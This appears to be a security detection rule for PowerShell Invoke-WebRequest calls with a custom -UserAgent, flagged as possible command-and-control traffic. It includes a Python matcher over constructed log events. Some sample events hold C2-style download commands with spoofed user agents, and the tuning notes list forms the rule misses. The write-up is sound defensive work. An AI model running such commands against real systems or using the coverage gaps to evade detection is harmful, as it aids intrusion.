
Summary
This detection rule targets use of PowerShell's `Invoke-WebRequest` cmdlet when it is invoked with the `-UserAgent` parameter. Adversaries leverage web protocols such as HTTP and HTTPS to communicate with remote systems for command and control (C2), and supplying a custom User-Agent string lets their requests blend with legitimate browser or updater traffic to evade detection. The rule requires PowerShell script block logging to be enabled on the Windows system, since the logged script block text (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, enabled by setting EnableScriptBlockLogging to 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging) is where the command and its parameters are captured. When the cmdlet and the parameter appear together in a logged script block, an alert is raised to flag possible C2 activity. This maps to ATT&CK T1071.001, Application Layer Protocol: Web Protocols, a Command and Control technique that covers C2 traffic disguised as ordinary web traffic. Expect tuning: administrative and deployment scripts also set `-UserAgent`, so baseline known-good scripts and hosts before alerting broadly, and note that a match on the literal cmdlet name will not fire on the `iwr` alias or on `Invoke-RestMethod`, which accepts the same parameter. Monitoring PowerShell activity this way remains valuable because it catches threats that rely on native tooling rather than dropped binaries.
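The following is an added Python example, not code from the rule or its source: it runs the matching logic the summary describes over a few constructed Event ID 4104 records (sample data, not real telemetry). It goes slightly beyond the rule as stated by also matching the `iwr` alias, by matching the parameter name case-insensitively as PowerShell does, and by joining backtick line continuations so a command split across lines is still evaluated as one statement; those three choices are assumptions and are marked in the comments. The event field names (`EventID`, `ScriptBlockText`) follow the 4104 record layout.

```python
import re

# Constructed sample events mimicking the ScriptBlockText field of
# Windows PowerShell Event ID 4104 records. Not real telemetry.
SAMPLE_EVENTS = [
    # Should match: cmdlet plus -UserAgent on one line.
    {"EventID": 4104, "ScriptBlockText":
        'Invoke-WebRequest -Uri "http://203.0.113.5/update" '
        '-UserAgent "Mozilla/5.0 (Windows NT 10.0)"'},
    # Should match (assumption: alias `iwr` and lower-case parameter are covered).
    {"EventID": 4104, "ScriptBlockText":
        'iwr http://203.0.113.5/beacon -useragent "MSIE 9.0" -OutFile $env:TEMP\\b.dat'},
    # Should match (assumption: backtick line continuation is joined first).
    {"EventID": 4104, "ScriptBlockText":
        'Invoke-WebRequest -Uri http://203.0.113.7/a `\n    -UserAgent "curl/7.0"'},
    # Should not match: Invoke-WebRequest without -UserAgent.
    {"EventID": 4104, "ScriptBlockText":
        'Invoke-WebRequest -Uri https://www.microsoft.com -UseBasicParsing'},
    # Should not match under this rule: a different cmdlet uses -UserAgent.
    {"EventID": 4104, "ScriptBlockText":
        'Invoke-RestMethod -Uri https://api.example.com/v1 -UserAgent "Tooling/1.0"'},
    # Should not match: cmdlet and parameter are in separate statements.
    {"EventID": 4104, "ScriptBlockText":
        'Invoke-WebRequest -Uri http://203.0.113.9/; $ua = "-UserAgent is set elsewhere"'},
    # Should not match: unrelated script block.
    {"EventID": 4104, "ScriptBlockText":
        'Get-Process | Where-Object { $_.Name -like "*agent*" }'},
]

# Cmdlet name or its alias as a whole token (assumption: alias `iwr` included).
CMDLET_RE = re.compile(r"(?<![\w-])(?:Invoke-WebRequest|iwr)(?![\w-])", re.IGNORECASE)
# The -UserAgent parameter as a whole token; allows the "-UserAgent:value" form.
UA_PARAM_RE = re.compile(r"(?<![\w-])-UserAgent(?![\w-])", re.IGNORECASE)


def statements(script_block_text):
    """Split a script block into statements.

    Backtick-newline is PowerShell's line continuation, so it is joined before
    splitting on newlines and semicolons (assumption: one statement per split).
    """
    joined = re.sub(r"`\r?\n", " ", script_block_text)
    for stmt in re.split(r"[;\r\n]+", joined):
        stmt = stmt.strip()
        if stmt:
            yield stmt


def matches_rule(event):
    """True when a 4104 script block has Invoke-WebRequest (or iwr) and
    -UserAgent in the same statement."""
    if event.get("EventID") != 4104:
        return False
    return any(
        CMDLET_RE.search(stmt) and UA_PARAM_RE.search(stmt)
        for stmt in statements(event.get("ScriptBlockText", ""))
    )


def run_detection(events):
    """Return the ScriptBlockText of every event that triggers the rule,
    tagged with the ATT&CK technique the rule maps to."""
    return [
        {"technique": "T1071.001", "script_block": e["ScriptBlockText"]}
        for e in events
        if matches_rule(e)
    ]


if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print(f"[{hit['technique']}] {hit['script_block']!r}")
```

Running the block prints the three constructed records that should fire. The `Invoke-RestMethod` sample is deliberately left unmatched to show the rule's stated scope; widening `CMDLET_RE` to include it is a one-token change if that coverage is wanted.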
Categories
- Endpoint
- Windows
Data Sources
- Script
ATT&CK Techniques
- T1071.001
Created: 2022-01-23